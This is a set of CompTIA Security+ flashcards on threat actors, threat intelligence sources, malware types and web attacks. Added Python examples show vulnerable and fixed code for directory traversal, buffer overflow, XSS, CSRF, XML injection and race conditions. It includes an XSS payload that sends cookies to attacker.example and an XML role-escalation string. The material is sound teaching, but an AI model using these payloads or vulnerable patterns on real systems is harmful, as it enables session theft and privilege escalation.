Domain 1: Threats, Attacks, and Vulnerabilities (24%) Flashcards
*1.5 Actors and threats
White Hat (CompTIA: Authorized) ethical hackers, Penetration Testers
Non-malicious hackers who attempt to break into a company’s systems at their request
*1.5 Actors and threats
Black Hat (CompTIA: Unauthorized)
Malicious hackers who break into computer systems and networks without authorization or permission
*1.5 Actors and threats
Gray Hats (CompTIA: Semi-authorized)
Hackers with no affiliation to a company who attempt to break into its network anyway, often without malicious intent; because they have no authorization, they risk breaking the law.
*1.5 Actors and threats
Script kiddies
Have limited skill and only run other people’s exploits and tools
*1.5 Actors and threats
Hacktivists
Hackers who are driven by a cause like social change, political agendas, or terrorism.
ex: Anonymous
*1.5 Actors and threats
Advanced Persistent Threats (APT)
Highly trained and well-funded groups of hackers (often sponsored by nation-states) with covert and open-source intelligence at their disposal; "persistent" because they aim to stay hidden inside a target network for a long time.
*1.5 Threat intelligence sources
Proprietary source
Proprietary threat intelligence comes as a commercial service offering: you pay a subscription fee for access to the provider's updates and research.
Note: Some commercial feeds mostly repackage information that is already available in free public sources, so check what original analysis the subscription actually adds before paying for it.
*1.5 Threat intelligence sources
Closed-source
Closed-source data is derived from the provider's own research and analysis efforts, such as data from honeynets they operate, plus information mined from their other customers' systems, suitably anonymized (stripped of anything that identifies which person or entity it relates to).
example: FireEye
*1.5 Threat intelligence sources
Open-source
Open-source data is available for use without a subscription. It may include threat feeds similar to those of commercial providers, reputation lists, and malware signature databases.
example: US-CERT, UK's NCSC, AT&T Cybersecurity (AlienVault OTX), MISP, VirusTotal, Spamhaus, SANS ISC Suspicious Domains.
*1.5 Threat intelligence sources
Open-source intelligence (OSINT)
Methods of obtaining information about a person or organization from publicly available sources: public records, websites, and social media.
example: Google searches, Facebook and LinkedIn profiles, public records, company websites, and social media. (Active enumeration scans against the target are reconnaissance, not OSINT, because they touch the target's systems.)
*1.7 Threat Hunting
A cybersecurity technique designed to detect the presence of threats that have not been discovered by normal security monitoring. It is proactive, not reactive like incident response: the hunter starts from a hypothesis about attacker activity and searches logs and endpoints for evidence of it.
*1.2 Malware
Malware
Malicious software designed to infiltrate a computer system and possibly damage it without the user's knowledge or consent.
examples: viruses, worms, trojan horses, ransomware, spyware, rootkits, logic bombs, backdoors. (Spam is unwanted messaging, not malware, although it is a common delivery channel for malware.)
*1.2 Malware
Virus
Malicious code that runs on a machine without the user's knowledge and infects the computer when executed (10 types: Boot sector, Macro, Program, Multipartite, Encrypted, Polymorphic, Metamorphic, Stealth, Armored, Hoax).
Remember: It needs user interaction, like installing a program or opening a file, to execute and spread.
*1.2 Malware
Worms
Malicious software, like a virus, but able to replicate itself across a network without user interaction. Doesn't need you to do anything in order to spread.
Example: A user receives an e-mail or instant-message attachment that contains a worm. When the attachment is opened, the worm infects the user's computer and then spreads on its own by sending copies of the same message to everyone in the user's address book (or by exploiting vulnerable services on other hosts). The initial infection may need one click; the replication afterwards does not.
*1.2 Malware
Trojans
A Trojan horse is malicious software disguised as harmless or desirable software. Once downloaded and run, it can take control of the computer and may open the door for other malware.
Note: Trojans are usually delivered through e-mail attachments, websites, and instant messages, disguised as popular programs such as games, pictures, or music.
*1.2 Malware
Remote Access Trojan (RAT)
A trojan that provides the attacker with remote control of a victim machine.
Note: The ultimate backdoor that provides administrative control of a device (Prof. Messer).
*1.2 Malware
Ransomware
Malware that restricts access to a victim's computer or files, typically by locking the screen or encrypting the files, until a ransom is paid.
*1.2 Malware
Spyware
Software that secretly gathers information about the user without their consent. Hint: may include a keylogger.
Note: Adware displays unwanted advertisements; it is treated as spyware when it also tracks your activity in order to target those ads.
*1.2 Malware
Rootkit
Software designed to gain administrative (root or kernel) level control over a system while hiding its presence from the operating system and security tools.
Note: DLL injection and driver manipulation are typical rootkit techniques (exam hint: DLL injection or driver manipulation = rootkit).
*1.1 Spam
the abuse of electronic messaging systems, most commonly through email.
-social media
-broadcast media
*1.1 Spim
abuse of instant messaging systems.
-texting
-instant messaging
What is a Threat Vector?
The method used by an attacker to access a victim’s machine
*1.1 What is a Watering hole attack?
When malware is placed on a website (the watering hole) that you know your potential victims will visit.
Example: A watering hole is a place where animals come to drink; a predator waits nearby for one of them to be careless. Here the malware waits on the site the victims are known to visit.
*1.2 Malware
Botnet
A collection of compromised computers (bots or zombies) under the control of an attacker through a command-and-control (C2) server, also called the master node.
*1.2 Malware
Backdoor
Backdoors are used to bypass normal security and authentication functions.
A way for a software programmer to access a program while bypassing its authentication schemes. The backdoor is coded in by the programmer during development so that later she can “break into” her own program without having to authenticate to the system through normal access methods.
Note: Remote Access Trojans (RATs) are the ultimate backdoor- Administrative control of a device
*1.2 Malware
Logic Bombs
Malicious code that has been inserted inside a program and will execute only when certain conditions have been met.
*1.4 Wireless
Bluejacking
Sending of unsolicited messages to Bluetooth-enabled devices.
*1.4 Wireless
Bluesnarfing
Unauthorized access of information from a wireless device over a Bluetooth connection. “taking info”
*1.2 Malware
Backdoor
Code placed in computer programs to bypass normal authentication and other security mechanisms.
Note: Backdoors are a poor coding practice and should not be utilized.
*1.3 Directory Traversal
Method of accessing unauthorized directories by moving through the directory structure on a remote server, typically with "../" sequences in a user-supplied path.
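The pattern described above, as an added example that is not part of the original deck: a naive path join that lets "../" sequences (or an absolute path) escape the document root, beside a resolver that canonicalises the path and checks it is still under the root. The document root "/srv/files" is an assumed value; nothing has to exist on disk.

```python
import os

# Assumed document root for the example; any directory path works.
BASE_DIR = "/srv/files"


def resolve_vulnerable(base, user_path):
    """Naive join: '..' segments and absolute paths walk out of base."""
    return os.path.normpath(os.path.join(base, user_path))


def resolve_safe(base, user_path):
    """Resolve the path, then verify it is still inside base before use."""
    base_real = os.path.realpath(base)
    # realpath() collapses '..' and symlinks; join() alone is not enough because
    # an absolute user_path such as '/etc/passwd' discards base entirely.
    target = os.path.realpath(os.path.join(base_real, user_path))
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError(f"path escapes document root: {user_path!r}")
    return target


def escapes_root(base, user_path):
    """True if resolve_safe() would reject the path."""
    try:
        resolve_safe(base, user_path)
        return False
    except ValueError:
        return True
```

The check must run on the canonical path, not on the raw string: filtering "../" out of the input misses encoded forms (e.g. `..%2f`) that the web server decodes before the file system sees them.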
*1.6 Zero-day
An attack against a vulnerability that is unknown to the original developer or manufacturer, so no patch or signature exists yet when it is exploited.
*1.3 Buffer overflows
Occurs when a process stores data outside the memory range allocated by the developer.
Buffer overflow attacks attempt to put more data into a buffer than it is designed to hold, so the excess overwrites adjacent memory (for example a saved return address on the stack).
Let's pretend that you have a glass sitting on a table. It can hold a certain amount of water, right? If it's designed to hold 16 ounces of liquid but you pour 20 ounces in, the glass is going to overflow and the table is going to get wet. In this example, the glass is our buffer, the water is our data, and when we overflow it the extra spills onto the table and makes a huge mess.
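The glass analogy, carried into a toy model of memory as an added example (not from the original deck). The `StackFrame` class, its 16-byte buffer, the 8-byte saved return address placed right after it and the address values are all assumptions made for illustration; real memory layout is set by the compiler, and in C the unchecked copy would keep writing past the end of the frame rather than stop.

```python
RET_ADDR_SIZE = 8
BUF_SIZE = 16


class StackFrame:
    """Toy model of one stack frame: a 16-byte local buffer immediately
    followed by the 8-byte saved return address (little-endian), as on x86-64.
    Layout and values are illustrative, not a real process's memory."""

    def __init__(self, return_address=0x401000):
        self.memory = bytearray(BUF_SIZE + RET_ADDR_SIZE)
        self.memory[BUF_SIZE:] = return_address.to_bytes(RET_ADDR_SIZE, "little")

    def saved_return_address(self):
        return int.from_bytes(self.memory[BUF_SIZE:], "little")

    def copy_unchecked(self, data):
        """strcpy()-style copy: writes every byte, never looks at the buffer size."""
        for i, byte in enumerate(data):
            self.memory[i] = byte  # past index 15 this clobbers the return address
        return self.saved_return_address()

    def copy_bounded(self, data):
        """Bounded copy: reject anything that would not fit (the fix)."""
        if len(data) > BUF_SIZE:
            raise ValueError(f"input of {len(data)} bytes exceeds {BUF_SIZE}-byte buffer")
        self.memory[:len(data)] = data
        return self.saved_return_address()


def overflow_demo():
    # 16 bytes of filler reach the end of the buffer; the next 8 bytes land on
    # the saved return address and would redirect execution on return.
    payload = b"A" * BUF_SIZE + (0xDEADBEEF).to_bytes(RET_ADDR_SIZE, "little")
    unchecked = StackFrame().copy_unchecked(payload)
    try:
        StackFrame().copy_bounded(payload)
        bounded = "overflowed"
    except ValueError:
        bounded = "rejected"
    return unchecked, bounded
```

The point of the model is adjacency: the 24-byte payload is only 8 bytes too long, and those 8 bytes are exactly what replaces the saved return address. A length check before the copy is the whole fix.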
*1.3 Cross-site scripting
XSS
Cross-site scripting occurs when an attacker embeds malicious script into a trusted website, so that it runs in the browsers of that site's users with the site's origin and privileges.
When this occurs, the attacker is trying to steal session cookies or other information stored by the victim's web browser for that site, or to perform actions in the web application as the victim.
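An added example, not from the original deck, of the two output contexts where a script lands in the page: untrusted text dropped straight into HTML beside the same text escaped for that context, and a value reflected into an attribute, where the quote character must be escaped as well. The payloads and the `attacker.example` hostname are constructed for the demonstration.

```python
import html

# Constructed payloads: a stored comment and a value reflected into an attribute.
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_comment_vulnerable(comment):
    # Untrusted text dropped straight into the page: the browser parses it as HTML.
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    # Escaped for an HTML text context: < > & " ' become entities, so the
    # browser shows the payload as text and never executes it.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attr_vulnerable(value):
    # The input's first quote ends value="..." and the rest becomes new attributes.
    return f'<input name="q" value="{value}">'


def render_attr_safe(value):
    # Attribute context: quote=True turns " into &quot;, so the input cannot
    # break out of the attribute and add an event handler.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'
```

Escaping has to match the context the data is written into; the same string needs different treatment inside a `<script>` block or a URL, which is why template engines that escape by default are preferred over hand-built strings.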
*1.3 Cross-site request forgery
XSRF/CSRF
In a cross-site request forgery, the attacker forces the user's browser to execute actions on a web server to which the user has already been authenticated.
For example, let's say that you've already logged into your bank's website with your username and password. At this point you're authenticated and the website trusts your session cookie. If an attacker can get your browser to send a request to the web server through that authenticated session (for example from a hidden form on a page you visit), they are forging the request to make it look like it came from you. The attacker cannot see the web server's response to the request, but can still use this to transfer funds from the victim, change their password, or make a myriad of other requests on the victim's behalf.
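The bank scenario above as a toy model, added here and not part of the original deck. `Bank` stands in for the web application: the browser attaches the session cookie to any request, so a forged transfer succeeds when the server trusts the cookie alone, and fails when the server also requires a per-session anti-CSRF token that only the bank's own pages can read. Users, balances and amounts are constructed values.

```python
import secrets


class Bank:
    """Toy web app: cookie-authenticated sessions and a money-transfer form."""

    def __init__(self):
        self.sessions = {}                    # session cookie -> {"user", "csrf"}
        self.balances = {"victim": 1000, "attacker": 0}

    def login(self, user):
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = {"user": user, "csrf": secrets.token_hex(16)}
        return cookie

    def csrf_token(self, cookie):
        # A real app embeds this in the form it serves; same-origin policy stops
        # the attacker's page from reading it.
        return self.sessions[cookie]["csrf"]

    def transfer(self, cookie, form, require_token):
        session = self.sessions.get(cookie)
        if session is None:
            return "401 not logged in"
        if require_token and not secrets.compare_digest(form.get("csrf", ""), session["csrf"]):
            return "403 missing or invalid CSRF token"
        self.balances[session["user"]] -= form["amount"]
        self.balances[form["to"]] += form["amount"]
        return "200 transferred"

    def forged_request(self, victim_cookie, require_token):
        """What an attacker's page achieves: the victim's browser auto-attaches the
        session cookie, but the page cannot read the token or the response."""
        return self.transfer(victim_cookie, {"to": "attacker", "amount": 500}, require_token)


def csrf_demo(require_token):
    bank = Bank()
    cookie = bank.login("victim")
    status = bank.forged_request(cookie, require_token)
    return status, bank.balances["victim"], bank.balances["attacker"]
```

Setting the session cookie with the `SameSite` attribute is the complementary browser-side control: it stops the cookie being attached to cross-site requests in the first place.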
*1.3 Injections
Structured Query Language (SQL) injection
Attack consisting of the insertion or injection of SQL syntax via input data from the client to a web application, so that the input is executed as part of the database query instead of being treated as a value.
*1.3 Injections
Extensible Markup Language (XML) injection
XML injection inserts attacker-controlled markup into XML that a web application builds from user input. Web applications use XML for authentication and authorization exchanges (SAML, for example) and for other kinds of data exchange and uploads, so injected elements can change the data that the application or its back end trusts.
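An added example, not from the original deck, of a user record assembled as XML by string formatting beside the same record built through an XML API that escapes the text. The `<users>` document layout, the `role` field and the payload are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET


def build_vulnerable(username, role="user"):
    # Markup assembled by string formatting: the input is parsed as XML structure.
    return f"<users><user><name>{username}</name><role>{role}</role></user></users>"


def build_safe(username, role="user"):
    # Built through the XML API, which escapes <, > and & in text nodes, so the
    # input can only ever be a value, never new elements.
    root = ET.Element("users")
    user = ET.SubElement(root, "user")
    ET.SubElement(user, "name").text = username
    ET.SubElement(user, "role").text = role
    return ET.tostring(root, encoding="unicode")


def parse_roles(xml_text):
    """What the consuming system sees: one (name, role) pair per <user> element."""
    return [(u.findtext("name"), u.findtext("role"))
            for u in ET.fromstring(xml_text).findall("user")]


# Constructed payload: closes the <name> and <user> elements the app opened and
# starts a second user record carrying an elevated role.
PAYLOAD = "mallory</name><role>admin</role></user><user><name>ghost"
```

The vulnerable document parses as two users, the first of them an admin, even though the application only meant to write one ordinary user. The safe document still contains the payload, but as the literal text of a single `<name>` element.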
*1.3 Race condition
A software vulnerability where the outcome of execution depends on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.
- A race condition vulnerability is found where multiple threads attempt to write a variable or object at the same memory location at the same time.
A funky way of saying that the computer is racing itself. If you're trying to do something legitimately and the attacker tries to do something at the same time and gets in before you, they have taken advantage of the race condition to run their operation before yours. This is a very specific case: when we talk about a race condition vulnerability, we mean multiple threads attempting to write a variable or object at the same memory location, at the same time.
*1.3 Race conditions
Time of check/Time of use (TOCTOU/TOCTTOU)
The potential vulnerability that occurs when a resource changes between when an app checked it and when the app used it.
If the attacker can identify when the check happens and act before the use, that's a race condition: they manipulate the resource after it has been checked but before it is used by the application, so the app operates on something it never actually validated.
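The classic file-system form of this, as an added example that is not part of the original deck: the app checks that a path is a regular file, an attacker swaps the path for a symlink to a secret file inside the window, and the app then reads the secret. The fix opens first, refusing to follow symlinks, and checks the open descriptor itself. The `during_window` hook stands in for the scheduler giving the attacker a turn; file names and contents are constructed, and `O_NOFOLLOW` assumes a POSIX system.

```python
import os
import stat
import tempfile


def read_if_regular_racy(path, during_window=None):
    # Time of check: inspect the path name...
    if os.path.islink(path) or not os.path.isfile(path):
        raise PermissionError("not a regular file")
    if during_window:
        during_window()          # ...the window in which an attacker may act...
    # Time of use: open the path, which now follows whatever it points to.
    with open(path, "rb") as f:
        return f.read()


def read_if_regular_safe(path):
    # Open first, refusing to follow a symlink (O_NOFOLLOW, assumes POSIX), then
    # check the open descriptor, so check and use refer to the same object.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd, "rb") as f:
        if not stat.S_ISREG(os.fstat(f.fileno()).st_mode):
            raise PermissionError("not a regular file")
        return f.read()


def toctou_demo(use_safe):
    """Attacker swaps public.txt for a symlink to secret.txt between check and use."""
    with tempfile.TemporaryDirectory() as d:
        public = os.path.join(d, "public.txt")
        secret = os.path.join(d, "secret.txt")
        with open(public, "wb") as f:
            f.write(b"public data")
        with open(secret, "wb") as f:
            f.write(b"secret data")

        def attacker_swaps():
            os.remove(public)
            os.symlink(secret, public)

        if not use_safe:
            return read_if_regular_racy(public, during_window=attacker_swaps)
        attacker_swaps()                      # even with the swap already done...
        try:
            return read_if_regular_safe(public)
        except OSError:                       # ...O_NOFOLLOW fails with ELOOP
            return b"blocked"
```

The general rule the safe version follows: never validate a name and then act on the name; act on the object you validated (here the file descriptor), or make the check and the use a single atomic operation.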
How can you prevent race conditions and TOCTTOU?
- Avoid separate check-then-use steps where possible; perform the check and the use as one atomic operation
- Implement a locking mechanism to provide the app with exclusive access to the resource while it checks and uses it
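The second prevention above, shown as an added example that is not from the original deck: two threads withdraw from one account. The racy version checks the balance, then deducts, so both threads pass the check before either deducts and the balance goes negative; the locked version holds a lock across check and use so only one withdrawal succeeds. The `Account` class, the balance of 100 and the `threading.Barrier` used to force the interleaving deterministically are constructed for the demonstration.

```python
import threading


class Account:
    def __init__(self, balance):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw_racy(self, amount, between=None):
        if self.balance >= amount:          # time of check
            if between:
                between()                   # window: other threads run here
            self.balance -= amount          # time of use
            return True
        return False

    def withdraw_locked(self, amount):
        with self._lock:                    # check and use under one lock: atomic
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False


def run_threads(withdraw, n_threads=2, amount=100):
    """Run n_threads concurrent withdrawals; return the list of success flags."""
    results = []
    threads = [threading.Thread(target=lambda: results.append(withdraw(amount)))
               for _ in range(n_threads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def race_demo():
    acct = Account(100)
    gate = threading.Barrier(2)   # both threads finish the check before either deducts
    results = run_threads(lambda amt: acct.withdraw_racy(amt, between=gate.wait))
    return acct.balance, sum(results)


def locked_demo():
    acct = Account(100)
    results = run_threads(acct.withdraw_locked)
    return acct.balance, sum(results)
```

Without the barrier the racy version fails only when the scheduler happens to switch threads inside the window, which is exactly what makes race conditions hard to reproduce in testing and easy for an attacker to win by retrying.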